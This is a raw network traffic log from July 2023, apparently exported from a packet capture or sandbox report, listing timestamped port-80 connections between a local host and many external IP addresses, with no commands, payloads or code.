                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.022550106 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.022583961 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.022595882 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.022640944 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.023376942 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.023425102 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.023462057 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.023468971 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.023485899 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.023516893 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.023530006 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.023581028 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.052886009 CEST5021680192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.071712971 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126153946 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126218081 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126264095 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126308918 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126341105 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126354933 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126375914 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126401901 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126416922 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126446009 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126471043 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126504898 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126533031 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126590014 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126596928 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126648903 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126650095 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.126702070 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127239943 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127289057 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127304077 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127334118 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127337933 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127377987 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127387047 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127417088 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127430916 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.127475977 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128056049 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128103018 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128135920 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128160954 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128169060 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128221989 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128237009 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128281116 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128284931 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128341913 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128829002 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128876925 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128920078 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128926039 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128942013 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128972054 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.128979921 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129017115 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129019976 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129071951 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129774094 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129842997 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129864931 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129894018 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129901886 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129939079 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129942894 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129985094 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.129992962 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.130039930 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.130620003 CEST8050210172.67.201.26192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.130703926 CEST5021080192.168.2.4172.67.201.26
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.151607037 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.151663065 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.151711941 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.151732922 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.151761055 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.151812077 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.151812077 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.151812077 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.193068981 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.194938898 CEST5022080192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.200895071 CEST4992080192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.201147079 CEST80502163.140.13.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.202011108 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.212090969 CEST805016280.93.82.33192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.212249994 CEST5016280192.168.2.480.93.82.33
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.235575914 CEST805021823.227.38.74192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.235671043 CEST5021880192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.263258934 CEST5021980192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.294593096 CEST805016059.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.294673920 CEST5016080192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.317533016 CEST8049920104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.318417072 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.318514109 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.319447994 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.321419954 CEST805022066.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.321510077 CEST5022080192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.328598976 CEST5022080192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.366980076 CEST805016170.39.251.249192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.367080927 CEST5016180192.168.2.470.39.251.249
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.408158064 CEST5002980192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.413243055 CEST80502193.140.13.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.413690090 CEST5021980192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.417006016 CEST4990380192.168.2.4188.166.152.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.418010950 CEST5021980192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.418628931 CEST5022280192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.418793917 CEST5022380192.168.2.4188.166.152.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.423342943 CEST5022480192.168.2.469.163.218.51
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.435952902 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.446947098 CEST8049903188.166.152.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.448395967 CEST8050223188.166.152.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.448474884 CEST5022380192.168.2.4188.166.152.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.454111099 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.454143047 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.454166889 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.454191923 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.454217911 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.454243898 CEST805020639.99.233.155192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.454354048 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.454354048 CEST5020680192.168.2.439.99.233.155
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.454915047 CEST805022066.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.455634117 CEST805022066.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.455693960 CEST5022080192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.477272034 CEST5022380192.168.2.4188.166.152.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.481077909 CEST5022580192.168.2.4195.78.66.50
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.483619928 CEST5022080192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.505036116 CEST4989780192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.505682945 CEST5022680192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.507224083 CEST8050223188.166.152.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.509349108 CEST8050223188.166.152.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.509416103 CEST5022380192.168.2.4188.166.152.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.538342953 CEST8050111202.254.236.40192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.538427114 CEST5011180192.168.2.4202.254.236.40
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.542772055 CEST4972980192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.551407099 CEST8050029104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.558434963 CEST5019380192.168.2.496.91.204.114
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.561949015 CEST8050222104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.562072992 CEST5022280192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.568587065 CEST80502193.140.13.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.568645954 CEST80502193.140.13.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.568696976 CEST5021980192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.568738937 CEST5021980192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.588021040 CEST5021980192.168.2.43.140.13.188
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.588059902 CEST5022280192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.589504004 CEST805022469.163.218.51192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.589658022 CEST5022480192.168.2.469.163.218.51
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.611015081 CEST805022066.94.119.160192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.611110926 CEST5022080192.168.2.466.94.119.160
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.675710917 CEST5022480192.168.2.469.163.218.51
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.693417072 CEST8049897154.203.14.100192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.693510056 CEST4989780192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.708043098 CEST8050226154.203.14.100192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.708203077 CEST5022680192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.710026026 CEST5022680192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.720758915 CEST4990680192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.721951008 CEST5022780192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.731597900 CEST8050222104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.732393026 CEST8050222104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.732870102 CEST5022280192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.733885050 CEST4991180192.168.2.413.224.103.91
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.734457970 CEST5022880192.168.2.413.224.103.91
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.737773895 CEST80502193.140.13.188192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.737827063 CEST804990623.227.38.74192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.737950087 CEST4990680192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.738265038 CEST805022723.227.38.74192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.738820076 CEST5022780192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.744441032 CEST804991113.224.103.91192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.744807005 CEST4991180192.168.2.413.224.103.91
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.744884014 CEST805022813.224.103.91192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.745923042 CEST5019880192.168.2.4193.166.255.171
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.745987892 CEST5022880192.168.2.413.224.103.91
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.760957003 CEST5022780192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.761050940 CEST5022880192.168.2.413.224.103.91
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763552904 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763612986 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763652086 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763659954 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763689995 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763706923 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763716936 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763760090 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763768911 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763804913 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763809919 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763853073 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763897896 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763912916 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.763964891 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.764029026 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.764210939 CEST5022280192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.768481970 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.770929098 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.771507978 CEST805022813.224.103.91192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.771794081 CEST805022813.224.103.91192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.771872044 CEST5022880192.168.2.413.224.103.91
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.777152061 CEST5013080192.168.2.496.127.180.42
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.777189970 CEST805022723.227.38.74192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.805547953 CEST5022880192.168.2.413.224.103.91
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.816051006 CEST805022813.224.103.91192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.816252947 CEST805022813.224.103.91192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.818800926 CEST5022880192.168.2.413.224.103.91
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.842418909 CEST805022469.163.218.51192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.843112946 CEST805022469.163.218.51192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.843633890 CEST5022480192.168.2.469.163.218.51
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.859406948 CEST805022469.163.218.51192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.859502077 CEST5022480192.168.2.469.163.218.51
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.859780073 CEST805017262.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.859980106 CEST5017280192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.883008957 CEST4973880192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.883814096 CEST5022980192.168.2.4122.128.109.107
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927089930 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927155972 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927205086 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927249908 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927290916 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927297115 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927334070 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927344084 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927388906 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927407980 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927438021 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927505016 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927525043 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927570105 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927592993 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927622080 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927669048 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927694082 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927737951 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927781105 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927803993 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927818060 CEST8050222104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927860975 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927879095 CEST8050222104.196.26.65192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927920103 CEST8050226154.203.14.100192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.927994013 CEST5022280192.168.2.4104.196.26.65
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.928035021 CEST5022680192.168.2.4154.203.14.100
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.935210943 CEST805022723.227.38.74192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.935301065 CEST5022780192.168.2.423.227.38.74
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.942565918 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.942660093 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.942702055 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.942751884 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.943034887 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.943120956 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.989820957 CEST5022480192.168.2.469.163.218.51
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.997822046 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:33.998738050 CEST5022180192.168.2.4104.218.10.254
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.044558048 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.044646025 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.044682026 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.044718981 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.044754028 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.044785023 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.044819117 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.044847012 CEST8050221104.218.10.254192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:44:34.044877052 CEST8050221104.218.10.254192.168.2.4
